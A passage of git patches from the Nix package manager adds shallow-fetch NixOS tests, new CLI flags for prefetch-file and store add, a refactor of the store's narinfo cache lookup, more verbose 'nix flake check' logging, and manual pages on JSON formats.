getCachePath(repoInfo.url); + Path cacheDir = getCachePath(repoInfo.url, getShallowAttr(input)); repoDir = cacheDir; repoInfo.gitDir = "."; diff --git a/tests/nixos/fetch-git/test-cases/shallow-cache-separation/default.nix b/tests/nixos/fetch-git/test-cases/shallow-cache-separation/default.nix new file mode 100644 index 000000000..57561e74b --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/shallow-cache-separation/default.nix @@ -0,0 +1,57 @@ +{ + description = "can fetch the same repo shallowly and non-shallowly"; + script = '' + # create branch1 off of main + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' \ + \ + && {repo.git} push origin --all + """) + + # save the revision + mainRev = client.succeed(f""" + {repo.git} rev-parse main + """).strip() + + # fetch shallowly + revCountShallow = client.succeed(f""" + nix eval --impure --expr ' + (builtins.fetchGit {{ + url = "{repo.remote}"; + rev = "{mainRev}"; + shallow = true; + }}).revCount + ' + """).strip() + # ensure the revCount is 0 + assert revCountShallow == "0", f"revCountShallow should be 0, but is {revCountShallow}" + + # fetch non-shallowly + revCountNonShallow = client.succeed(f""" + nix eval --impure --expr ' + (builtins.fetchGit {{ + url = "{repo.remote}"; + rev = "{mainRev}"; + shallow = false; + }}).revCount + ' + """).strip() + # ensure the revCount is 1 + assert revCountNonShallow == "1", f"revCountNonShallow should be 1, but is {revCountNonShallow}" + + # fetch shallowly again + revCountShallow2 = client.succeed(f""" + nix eval --impure --expr ' + (builtins.fetchGit {{ + url = "{repo.remote}"; + rev = "{mainRev}"; + shallow = true; + }}).revCount + ' + """).strip() + # ensure the revCount is 0 + assert revCountShallow2 == "0", f"revCountShallow2 should be 0, but is {revCountShallow2}" + ''; +} diff --git a/tests/nixos/fetch-git/test-cases/shallow-ignore-ref/default.nix b/tests/nixos/fetch-git/test-cases/shallow-ignore-ref/default.nix new file mode 100644 index 000000000..456ee8341 --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/shallow-ignore-ref/default.nix @@ -0,0 +1,40 @@ +{ + description = "ensure that ref gets ignored when shallow=true is set"; + script = '' + # create branch1 off of main + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' \ + \ + && {repo.git} checkout -b branch1 main \ + && echo bangkok > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit2' \ + \ + && {repo.git} push origin --all + """) + + # save the revisions + mainRev = client.succeed(f""" + {repo.git} rev-parse main + """).strip() + branch1Rev = client.succeed(f""" + {repo.git} rev-parse branch1 + """).strip() + + # Ensure that ref gets ignored when fetching shallowly. + # This would fail if the ref was respected, as branch1Rev is not on main. + client.succeed(f""" + nix eval --impure --raw --expr ' + (builtins.fetchGit {{ + url = "{repo.remote}"; + rev = "{branch1Rev}"; + ref = "main"; + shallow = true; + }}) + ' + """) + + ''; +} diff --git a/tests/nixos/fetch-git/test-cases/ssh-shallow/default.nix b/tests/nixos/fetch-git/test-cases/ssh-shallow/default.nix new file mode 100644 index 000000000..979512af9 --- /dev/null +++ b/tests/nixos/fetch-git/test-cases/ssh-shallow/default.nix @@ -0,0 +1,52 @@ +{ + description = "can fetch a git repo via ssh using shallow=1"; + script = '' + # add a file to the repo + client.succeed(f""" + echo chiang-mai > {repo.path}/thailand \ + && {repo.git} add thailand \ + && {repo.git} commit -m 'commit1' + """) + + # memoize the revision + rev1 = client.succeed(f""" + {repo.git} rev-parse HEAD + """).strip() + + # push to the server + client.succeed(f""" + {repo.git} push origin-ssh main + """) + + fetchGit_expr = f""" + builtins.fetchGit {{ + url = "{repo.remote_ssh}"; + rev = "{rev1}"; + shallow = true; + }} + """ + + # fetch the repo via nix + fetched1 = client.succeed(f""" + nix eval --impure --raw --expr '({fetchGit_expr}).outPath' + """) + + # check if the committed file is there + client.succeed(f""" + test -f {fetched1}/thailand + """) + + # check if the revision is the same + rev1_fetched = client.succeed(f""" + nix eval --impure --raw --expr '({fetchGit_expr}).rev' + """).strip() + assert rev1 == rev1_fetched, f"rev1: {rev1} != rev1_fetched: {rev1_fetched}" + + # check if revCount is 1 + revCount1 = client.succeed(f""" + nix eval --impure --expr '({fetchGit_expr}).revCount' + """).strip() + print(f"revCount1: {revCount1}") + assert revCount1 == '0', f"rev count is not 0 but {revCount1}" + ''; +} diff --git a/tests/nixos/fetch-git/testsupport/gitea-repo.nix b/tests/nixos/fetch-git/testsupport/gitea-repo.nix index a3ad65ca4..e9f4adcc1 100644 --- a/tests/nixos/fetch-git/testsupport/gitea-repo.nix +++ b/tests/nixos/fetch-git/testsupport/gitea-repo.nix @@ -72,4 +72,4 @@ in """) ''; }; -} \ No newline at end of file +} From 75a6e6dd0eb60f3bcaaa3b33b085fb542638eb44 Mon Sep 17 00:00:00 2001 From: Yuxuan Shui Date: Thu, 18 Jan 2024 16:39:34 +0000 Subject: [PATCH 310/654] Add --unpack to nix store prefetch-file --- src/nix/prefetch.cc | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/src/nix/prefetch.cc b/src/nix/prefetch.cc index b5d619006..84b79ea28 100644 --- a/src/nix/prefetch.cc +++ b/src/nix/prefetch.cc @@ -262,6 +262,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON { std::string url; bool executable = false; + bool unpack = false; std::optional name; HashAlgorithm hashAlgo = HashAlgorithm::SHA256; std::optional expectedHash; @@ -294,6 +295,14 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON .handler = {&executable, true}, }); + addFlag({ + .longName = "unpack", + .description = + "Unpack the archive (which must be a tarball or zip file) and add " + "the result to the Nix store.", + .handler = {&unpack, true}, + }); + expectArg("url", &url); } @@ -310,7 +319,7 @@ struct CmdStorePrefetchFile : StoreCommand, MixJSON } void run(ref store) override { - auto [storePath, hash] = prefetchFile(store, url, name, hashAlgo, expectedHash, false, executable); + auto [storePath, hash] = prefetchFile(store, url, name, hashAlgo, expectedHash, unpack, executable); if (json) { auto res = nlohmann::json::object(); From 8983ee8b2e0c10e6cac672a5a7ada4698235a62e Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Wed, 17 Jan 2024 17:54:03 +0100 Subject: [PATCH 311/654] refactor: Un-callback transform Store::queryPathInfoFromClientCache This part of the code was not necessarily callback based. Removing CPS is always nice; particularly if there's no loss of functionality, like here. --- src/libstore/store-api.cc | 18 +++++++++--------- src/libstore/store-api.hh | 8 ++++---- 2 files changed, 13 insertions(+), 13 deletions(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 66bc95625..f237578e5 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -685,8 +685,7 @@ static bool goodStorePath(const StorePath & expected, const StorePath & actual) && (expected.name() == Store::MissingName || expected.name() == actual.name()); } -bool Store::queryPathInfoFromClientCache(const StorePath & storePath, - Callback> & callback) +std::optional> Store::queryPathInfoFromClientCache(const StorePath & storePath) { auto hashPart = std::string(storePath.hashPart()); @@ -696,8 +695,7 @@ bool Store::queryPathInfoFromClientCache(const StorePath & storePath, stats.narInfoReadAverted++; if (!res->didExist()) throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); - callback(ref(res->value)); - return true; + return ref(res->value); } } @@ -713,12 +711,11 @@ bool Store::queryPathInfoFromClientCache(const StorePath & storePath, !goodStorePath(storePath, res.second->path)) throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); } - callback(ref(res.second)); - return true; + return ref(res.second); } } - return false; + return std::nullopt; } @@ -728,8 +725,11 @@ void Store::queryPathInfo(const StorePath & storePath, auto hashPart = std::string(storePath.hashPart()); try { - if (queryPathInfoFromClientCache(storePath, callback)) - return; + auto r = queryPathInfoFromClientCache(storePath); + if (r.has_value()) { + ref & info = *r; + return callback(ref(info)); + } } catch (...) { return callback.rethrow(); } auto callbackPtr = std::make_shared(std::move(callback)); diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index 2a1092d9e..e47f2c768 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -285,14 +285,14 @@ public: /** * NOTE: this is not the final interface - to be modified in next commit. * - * Asynchronous version that only queries the local narinfo cache and not + * Version of queryPathInfo() that only queries the local narinfo cache and not * the actual store. * - * @return true if the path was known and the callback invoked - * @return false if the path was not known and the callback not invoked + * @return `std::make_optional(vpi)` if the path is known + * @return `std::null_opt` if the path was not known to be valid or invalid * @throw InvalidPathError if the path is known to be invalid */ - bool queryPathInfoFromClientCache(const StorePath & path, Callback> & callback); + std::optional> queryPathInfoFromClientCache(const StorePath & path); /** * Query the information about a realisation. From d19627e8b4c3c09b0cc1329a9acaa8e5b070f26e Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 19 Jan 2024 17:00:39 +0100 Subject: [PATCH 312/654] refactor: Remove throw from queryPathInfoFromClientCache Return a value instead of throwing. Rather than the more trivial refactor of wrapping the return value in another std::optional, we retain the meaning of the outer optional: "we know at least something." So we have changed: return nullopt -> return nullopt throw InvalidPath -> return make_optional(nullptr) return vpi -> return make_optional(vpi) --- src/libstore/store-api.cc | 22 ++++++++++++++-------- src/libstore/store-api.hh | 10 ++++------ 2 files changed, 18 insertions(+), 14 deletions(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index f237578e5..2cd40d510 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -685,7 +685,8 @@ static bool goodStorePath(const StorePath & expected, const StorePath & actual) && (expected.name() == Store::MissingName || expected.name() == actual.name()); } -std::optional> Store::queryPathInfoFromClientCache(const StorePath & storePath) + +std::optional> Store::queryPathInfoFromClientCache(const StorePath & storePath) { auto hashPart = std::string(storePath.hashPart()); @@ -693,9 +694,10 @@ std::optional> Store::queryPathInfoFromClientCache(cons auto res = state.lock()->pathInfoCache.get(std::string(storePath.to_string())); if (res && res->isKnownNow()) { stats.narInfoReadAverted++; - if (!res->didExist()) - throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); - return ref(res->value); + if (res->didExist()) + return std::make_optional(res->value); + else + return std::make_optional(nullptr); } } @@ -709,9 +711,10 @@ std::optional> Store::queryPathInfoFromClientCache(cons res.first == NarInfoDiskCache::oInvalid ? PathInfoCacheValue{} : PathInfoCacheValue{ .value = res.second }); if (res.first == NarInfoDiskCache::oInvalid || !goodStorePath(storePath, res.second->path)) - throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); + return std::make_optional(nullptr); } - return ref(res.second); + assert(res.second); + return std::make_optional(res.second); } } @@ -727,8 +730,11 @@ void Store::queryPathInfo(const StorePath & storePath, try { auto r = queryPathInfoFromClientCache(storePath); if (r.has_value()) { - ref & info = *r; - return callback(ref(info)); + std::shared_ptr & info = *r; + if (info) + return callback(ref(info)); + else + throw InvalidPath("path '%s' is not valid", printStorePath(storePath)); } } catch (...) { return callback.rethrow(); } diff --git a/src/libstore/store-api.hh b/src/libstore/store-api.hh index e47f2c768..2f8a9440e 100644 --- a/src/libstore/store-api.hh +++ b/src/libstore/store-api.hh @@ -283,16 +283,14 @@ public: Callback> callback) noexcept; /** - * NOTE: this is not the final interface - to be modified in next commit. - * * Version of queryPathInfo() that only queries the local narinfo cache and not * the actual store. * - * @return `std::make_optional(vpi)` if the path is known - * @return `std::null_opt` if the path was not known to be valid or invalid - * @throw InvalidPathError if the path is known to be invalid + * @return `std::nullopt` if nothing is known about the path in the local narinfo cache. + * @return `std::make_optional(nullptr)` if the path is known to not exist. + * @return `std::make_optional(validPathInfo)` if the path is known to exist. */ - std::optional> queryPathInfoFromClientCache(const StorePath & path); + std::optional> queryPathInfoFromClientCache(const StorePath & path); /** * Query the information about a realisation. From 356352c3709f69b6d11ed7f14ffa586219170908 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 19 Jan 2024 01:07:26 -0500 Subject: [PATCH 313/654] Add missing `--hash-algo` flag to `nix store add` --- doc/manual/rl-next/nix-store-add.md | 7 +++++++ src/nix/add-to-store.cc | 7 +++++-- tests/functional/add.sh | 2 ++ 3 files changed, 14 insertions(+), 2 deletions(-) create mode 100644 doc/manual/rl-next/nix-store-add.md diff --git a/doc/manual/rl-next/nix-store-add.md b/doc/manual/rl-next/nix-store-add.md new file mode 100644 index 000000000..d55711569 --- /dev/null +++ b/doc/manual/rl-next/nix-store-add.md @@ -0,0 +1,7 @@ +--- +synopsis: Give `nix store add` a `--hash-algo` flag +prs: 9809 +--- + +Adds a missing feature that was present in the old CLI, and matches our +plans to have similar flags for `nix hash convert` and `hash hash path`. diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc index 171848002..f2dbe8a2c 100644 --- a/src/nix/add-to-store.cc +++ b/src/nix/add-to-store.cc @@ -22,6 +22,7 @@ struct CmdAddToStore : MixDryRun, StoreCommand Path path; std::optional namePart; ContentAddressMethod caMethod = FileIngestionMethod::Recursive; + HashAlgorithm hashAlgo = HashAlgorithm::SHA256; CmdAddToStore() { @@ -51,6 +52,8 @@ struct CmdAddToStore : MixDryRun, StoreCommand this->caMethod = parseIngestionMethod(s); }}, }); + + addFlag(Flag::mkHashAlgoFlag("hash-algo", &hashAlgo)); } void run(ref store) override @@ -63,9 +66,9 @@ struct CmdAddToStore : MixDryRun, StoreCommand auto storePath = dryRun ? store->computeStorePath( - *namePart, accessor, path2, caMethod, HashAlgorithm::SHA256, {}).first + *namePart, accessor, path2, caMethod, hashAlgo, {}).first : store->addToStoreSlow( - *namePart, accessor, path2, caMethod, HashAlgorithm::SHA256, {}).path; + *namePart, accessor, path2, caMethod, hashAlgo, {}).path; logger->cout("%s", store->printStorePath(storePath)); } diff --git a/tests/functional/add.sh b/tests/functional/add.sh index d0fedcb25..762e01dbe 100644 --- a/tests/functional/add.sh +++ b/tests/functional/add.sh @@ -37,9 +37,11 @@ clearStore path3=$(nix store add-path ./dummy) [[ "$path1" == "$path2" ]] [[ "$path1" == "$path3" ]] + path4=$(nix store add --mode nar --hash-algo sha1 ./dummy) ) ( path1=$(nix store add --mode flat ./dummy) path2=$(nix store add-file ./dummy) [[ "$path1" == "$path2" ]] + path4=$(nix store add --mode flat --hash-algo sha1 ./dummy) ) From 49221493e243c4d10e69e7465a21be53902e16a8 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Thu, 31 Aug 2023 11:34:52 -0700 Subject: [PATCH 314/654] Log what `nix flake check` does There's still room for improvement, but this produces much more informative output with `-v`: ``` $ nix flake check -v evaluating flake... checking flake output 'checks'... checking derivation checks.aarch64-darwin.ghcid-ng-tests... checking derivation checks.aarch64-darwin.ghcid-ng-clippy... checking derivation checks.aarch64-darwin.ghcid-ng-doc... checking derivation checks.aarch64-darwin.ghcid-ng-fmt... checking derivation checks.aarch64-darwin.ghcid-ng-audit... checking flake output 'packages'... checking derivation packages.aarch64-darwin.ghcid-ng... checking derivation packages.aarch64-darwin.ghcid-ng-tests... checking derivation packages.aarch64-darwin.default... checking flake output 'apps'... checking flake output 'devShells'... checking derivation devShells.aarch64-darwin.default... running flake checks... warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux Use '--all-systems' to check all. ``` --- src/nix/flake.cc | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/src/nix/flake.cc b/src/nix/flake.cc index bebc62deb..0103a9cd9 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -395,6 +395,8 @@ struct CmdFlakeCheck : FlakeCommand auto checkDerivation = [&](const std::string & attrPath, Value & v, const PosIdx pos) -> std::optional { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking derivation %s", attrPath)); auto packageInfo = getDerivation(*state, v, false); if (!packageInfo) throw Error("flake attribute '%s' is not a derivation", attrPath); @@ -427,6 +429,8 @@ struct CmdFlakeCheck : FlakeCommand auto checkOverlay = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking overlay %s", attrPath)); state->forceValue(v, pos); if (!v.isLambda()) { throw Error("overlay is not a function, but %s instead", showType(v)); @@ -449,6 +453,8 @@ struct CmdFlakeCheck : FlakeCommand auto checkModule = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking NixOS module %s", attrPath)); state->forceValue(v, pos); } catch (Error & e) { e.addTrace(resolve(pos), hintfmt("while checking the NixOS module '%s'", attrPath)); @@ -460,6 +466,8 @@ struct CmdFlakeCheck : FlakeCommand checkHydraJobs = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking Hydra job %s", attrPath)); state->forceAttrs(v, pos, ""); if (state->isDerivation(v)) @@ -469,7 +477,7 @@ struct CmdFlakeCheck : FlakeCommand state->forceAttrs(*attr.value, attr.pos, ""); auto attrPath2 = concatStrings(attrPath, ".", state->symbols[attr.name]); if (state->isDerivation(*attr.value)) { - Activity act(*logger, lvlChatty, actUnknown, + Activity act(*logger, lvlInfo, actUnknown, fmt("checking Hydra job '%s'", attrPath2)); checkDerivation(attrPath2, *attr.value, attr.pos); } else @@ -484,7 +492,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkNixOSConfiguration = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { - Activity act(*logger, lvlChatty, actUnknown, + Activity act(*logger, lvlInfo, actUnknown, fmt("checking NixOS configuration '%s'", attrPath)); Bindings & bindings(*state->allocBindings(0)); auto vToplevel = findAlongAttrPath(*state, "config.system.build.toplevel", bindings, v).first; @@ -499,7 +507,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkTemplate = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { - Activity act(*logger, lvlChatty, actUnknown, + Activity act(*logger, lvlInfo, actUnknown, fmt("checking template '%s'", attrPath)); state->forceAttrs(v, pos, ""); @@ -533,6 +541,8 @@ struct CmdFlakeCheck : FlakeCommand auto checkBundler = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { + Activity act(*logger, lvlInfo, actUnknown, + fmt("checking bundler %s", attrPath)); state->forceValue(v, pos); if (!v.isLambda()) throw Error("bundler must be a function"); @@ -552,7 +562,7 @@ struct CmdFlakeCheck : FlakeCommand enumerateOutputs(*state, *vFlake, [&](const std::string & name, Value & vOutput, const PosIdx pos) { - Activity act(*logger, lvlChatty, actUnknown, + Activity act(*logger, lvlInfo, actUnknown, fmt("checking flake output '%s'", name)); try { From 9404ce36e4edd1df12892089bdab1ceb7d4d7a97 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 1 Sep 2023 13:09:01 -0700 Subject: [PATCH 315/654] Print derivation paths Also be more consistent with quotes around attribute paths --- src/nix/flake.cc | 20 +++++++++++++------- 1 file changed, 13 insertions(+), 7 deletions(-) diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 0103a9cd9..850ea77da 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -400,8 +400,16 @@ struct CmdFlakeCheck : FlakeCommand auto packageInfo = getDerivation(*state, v, false); if (!packageInfo) throw Error("flake attribute '%s' is not a derivation", attrPath); - // FIXME: check meta attributes - return packageInfo->queryDrvPath(); + else { + // FIXME: check meta attributes + auto storePath = packageInfo->queryDrvPath(); + if (storePath) { + logger->log(lvlInfo, + fmt("derivation evaluated to %s", + store->printStorePath(storePath.value()))); + } + return storePath; + } } catch (Error & e) { e.addTrace(resolve(pos), hintfmt("while checking the derivation '%s'", attrPath)); reportError(e); @@ -430,7 +438,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkOverlay = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { Activity act(*logger, lvlInfo, actUnknown, - fmt("checking overlay %s", attrPath)); + fmt("checking overlay '%s'", attrPath)); state->forceValue(v, pos); if (!v.isLambda()) { throw Error("overlay is not a function, but %s instead", showType(v)); @@ -454,7 +462,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkModule = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { Activity act(*logger, lvlInfo, actUnknown, - fmt("checking NixOS module %s", attrPath)); + fmt("checking NixOS module '%s'", attrPath)); state->forceValue(v, pos); } catch (Error & e) { e.addTrace(resolve(pos), hintfmt("while checking the NixOS module '%s'", attrPath)); @@ -466,8 +474,6 @@ struct CmdFlakeCheck : FlakeCommand checkHydraJobs = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { - Activity act(*logger, lvlInfo, actUnknown, - fmt("checking Hydra job %s", attrPath)); state->forceAttrs(v, pos, ""); if (state->isDerivation(v)) @@ -542,7 +548,7 @@ struct CmdFlakeCheck : FlakeCommand auto checkBundler = [&](const std::string & attrPath, Value & v, const PosIdx pos) { try { Activity act(*logger, lvlInfo, actUnknown, - fmt("checking bundler %s", attrPath)); + fmt("checking bundler '%s'", attrPath)); state->forceValue(v, pos); if (!v.isLambda()) throw Error("bundler must be a function"); From d75a5f427a385e56c821fdf49a70a150fe7fe6fd Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 1 Sep 2023 13:11:58 -0700 Subject: [PATCH 316/654] Print how many checks are run --- src/nix/flake.cc | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/src/nix/flake.cc b/src/nix/flake.cc index 850ea77da..0e34bd76a 100644 --- a/src/nix/flake.cc +++ b/src/nix/flake.cc @@ -781,7 +781,8 @@ struct CmdFlakeCheck : FlakeCommand } if (build && !drvPaths.empty()) { - Activity act(*logger, lvlInfo, actUnknown, "running flake checks"); + Activity act(*logger, lvlInfo, actUnknown, + fmt("running %d flake checks", drvPaths.size())); store->buildPaths(drvPaths); } if (hasErrors) From 561a56cd13b4f12e3dfb6c5e3f42e5d8add04ecc Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Mon, 18 Dec 2023 13:53:40 -0800 Subject: [PATCH 317/654] Add release notes --- .../rl-next/nix-flake-check-logs-actions.md | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 doc/manual/rl-next/nix-flake-check-logs-actions.md diff --git a/doc/manual/rl-next/nix-flake-check-logs-actions.md b/doc/manual/rl-next/nix-flake-check-logs-actions.md new file mode 100644 index 000000000..53a7b35eb --- /dev/null +++ b/doc/manual/rl-next/nix-flake-check-logs-actions.md @@ -0,0 +1,33 @@ +--- +synopsis: Some stack overflow segfaults are fixed +issues: 8882 +prs: 8893 +--- + +`nix flake check` now logs the checks it runs and the derivations it evaluates: + +``` +$ nix flake check -v +evaluating flake... +checking flake output 'checks'... +checking derivation 'checks.aarch64-darwin.ghciwatch-tests'... +derivation evaluated to /nix/store/nh7dlvsrhds4cxl91mvgj4h5cbq6skmq-ghciwatch-test-0.3.0.drv +checking derivation 'checks.aarch64-darwin.ghciwatch-clippy'... +derivation evaluated to /nix/store/9cb5a6wmp6kf6hidqw9wphidvb8bshym-ghciwatch-clippy-0.3.0.drv +checking derivation 'checks.aarch64-darwin.ghciwatch-doc'... +derivation evaluated to /nix/store/8brdd3jbawfszpbs7vdpsrhy80as1il8-ghciwatch-doc-0.3.0.drv +checking derivation 'checks.aarch64-darwin.ghciwatch-fmt'... +derivation evaluated to /nix/store/wjhs0l1njl5pyji53xlmfjrlya0wmz8p-ghciwatch-fmt-0.3.0.drv +checking derivation 'checks.aarch64-darwin.ghciwatch-audit'... +derivation evaluated to /nix/store/z0mps8dyj2ds7c0fn0819y5h5611033z-ghciwatch-audit-0.3.0.drv +checking flake output 'packages'... +checking derivation 'packages.aarch64-darwin.default'... +derivation evaluated to /nix/store/41abbdyglw5x9vcsvd89xan3ydjf8d7r-ghciwatch-0.3.0.drv +checking flake output 'apps'... +checking flake output 'devShells'... +checking derivation 'devShells.aarch64-darwin.default'... +derivation evaluated to /nix/store/bc935gz7dylzmcpdb5cczr8gngv8pmdb-nix-shell.drv +running 5 flake checks... +warning: The check omitted these incompatible systems: aarch64-linux, x86_64-darwin, x86_64-linux +Use '--all-systems' to check all. +``` From edf3ecc497d9931f84d8a28679b51773c761fdd8 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 22 Oct 2023 20:01:01 -0400 Subject: [PATCH 318/654] Document JSON formats Good to document these formats separately from commands that happen to use them. Eventually I would like this and `builtins.derivation` to refer to a store section on derivations that is authoritative, but that doesn't yet exist, and will take some time to make. So I think we're just best off merging this now as is. Co-authored-by: Valentin Gagarin --- doc/manual/src/SUMMARY.md.in | 3 + doc/manual/src/glossary.md | 2 +- doc/manual/src/json/derivation.md | 71 +++++++++++++++++ doc/manual/src/json/store-object-info.md | 97 ++++++++++++++++++++++++ src/libstore/globals.hh | 2 +- src/nix/derivation-add.md | 7 +- src/nix/derivation-show.md | 60 +-------------- 7 files changed, 181 insertions(+), 61 deletions(-) create mode 100644 doc/manual/src/json/derivation.md create mode 100644 doc/manual/src/json/store-object-info.md diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index c67ddc6cb..10fe51fc9 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -104,6 +104,9 @@ - [Channels](command-ref/files/channels.md) - [Default Nix expression](command-ref/files/default-nix-expression.md) - [Architecture and Design](architecture/architecture.md) +- [JSON Formats](json/index.md) + - [Store Object Info](json/store-object-info.md) + - [Derivation](json/derivation.md) - [Protocols](protocols/index.md) - [Serving Tarball Flakes](protocols/tarball-fetcher.md) - [Derivation "ATerm" file format](protocols/derivation-aterm.md) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 3c0570a44..124dc8d2e 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -127,7 +127,7 @@ non-[fixed-output](#gloss-fixed-output-derivation) derivation. -- [output-addressed store object]{#gloss-output-addressed-store-object} +- [content-addressed store object]{#gloss-content-addressed-store-object} A [store object] whose [store path] is determined by its contents. This includes derivations, the outputs of [content-addressed derivations](#gloss-content-addressed-derivation), and the outputs of [fixed-output derivations](#gloss-fixed-output-derivation). diff --git a/doc/manual/src/json/derivation.md b/doc/manual/src/json/derivation.md new file mode 100644 index 000000000..649d543cc --- /dev/null +++ b/doc/manual/src/json/derivation.md @@ -0,0 +1,71 @@ +# Derivation JSON Format + +> **Warning** +> +> This JSON format is currently +> [**experimental**](@docroot@/contributing/experimental-features.md#xp-feature-nix-command) +> and subject to change. + +The JSON serialization of a +[derivations](@docroot@/glossary.md#gloss-store-derivation) +is a JSON object with the following fields: + +* `name`: + The name of the derivation. + This is used when calculating the store paths of the derivation's outputs. + +* `outputs`: + Information about the output paths of the derivation. + This is a JSON object with one member per output, where the key is the output name and the value is a JSON object with these fields: + + * `path`: The output path. + + * `hashAlgo`: + For fixed-output derivations, the hashing algorithm (e.g. `sha256`), optionally prefixed by `r:` if `hash` denotes a NAR hash rather than a flat file hash. + + * `hash`: + For fixed-output derivations, the expected content hash in base-16. + + > **Example** + > + > ```json + > "outputs": { + > "out": { + > "path": "/nix/store/2543j7c6jn75blc3drf4g5vhb1rhdq29-source", + > "hashAlgo": "r:sha256", + > "hash": "6fc80dcc62179dbc12fc0b5881275898f93444833d21b89dfe5f7fbcbb1d0d62" + > } + > } + > ``` + +* `inputSrcs`: + A list of store paths on which this derivation depends. + +* `inputDrvs`: + A JSON object specifying the derivations on which this derivation depends, and what outputs of those derivations. + + > **Example** + > + > ```json + > "inputDrvs": { + > "/nix/store/6lkh5yi7nlb7l6dr8fljlli5zfd9hq58-curl-7.73.0.drv": ["dev"], + > "/nix/store/fn3kgnfzl5dzym26j8g907gq3kbm8bfh-unzip-6.0.drv": ["out"] + > } + > ``` + + specifies that this derivation depends on the `dev` output of `curl`, and the `out` output of `unzip`. + +* `system`: + The system type on which this derivation is to be built + (e.g. `x86_64-linux`). + +* `builder`: + The absolute path of the program to be executed to run the build. + Typically this is the `bash` shell + (e.g. `/nix/store/r3j288vpmczbl500w6zz89gyfa4nr0b1-bash-4.4-p23/bin/bash`). + +* `args`: + The command-line arguments passed to the `builder`. + +* `env`: + The environment passed to the `builder`. diff --git a/doc/manual/src/json/store-object-info.md b/doc/manual/src/json/store-object-info.md new file mode 100644 index 000000000..db43c2fa1 --- /dev/null +++ b/doc/manual/src/json/store-object-info.md @@ -0,0 +1,97 @@ +# Store object info JSON format + +> **Warning** +> +> This JSON format is currently +> [**experimental**](@docroot@/contributing/experimental-features.md#xp-feature-nix-command) +> and subject to change. + +Info about a [store object]. + +* `path`: + + [Store path][store path] to the given store object. + +* `narHash`: + + Hash of the [file system object] part of the store object when serialized as a [Nix Archive](#gloss-nar). + +* `narSize`: + + Size of the [file system object] part of the store object when serialized as a [Nix Archive](#gloss-nar). + +* `references`: + + An array of [store paths][store path], possibly including this one. + +* `ca` (optional): + + Content address of this store object's file system object, used to compute its store path. + +[store path]: @docroot@/glossary.md#gloss-store-path +[file system object]: @docroot@/store/file-system-object.md + +## Impure fields + +These are not intrinsic properties of the store object. +In other words, the same store object residing in different store could have different values for these properties. + +* `deriver` (optional): + + The path to the [derivation] from which this store object is produced. + + [derivation]: @docroot@/glossary.md#gloss-store-derivation + +* `registrationTime` (optional): + + When this derivation was added to the store. + +* `ultimate` (optional): + + Whether this store object is trusted because we built it ourselves, rather than substituted a build product from elsewhere. + +* `signatures` (optional): + + Signatures claiming that this store object is what it claims to be. + Not relevant for [content-addressed] store objects, + but useful for [input-addressed] store objects. + + [content-addressed]: @docroot@/glossary.md#gloss-content-addressed-store-object + [input-addressed]: @docroot@/glossary.md#gloss-input-addressed-store-object + +### `.narinfo` extra fields + +This meta data is specific to the "binary cache" family of Nix store types. +This information is not intrinsic to the store object, but about how it is stored. + +* `url`: + + Where to download a compressed archive of the file system objects of this store object. + +* `compression`: + + The compression format that the archive is 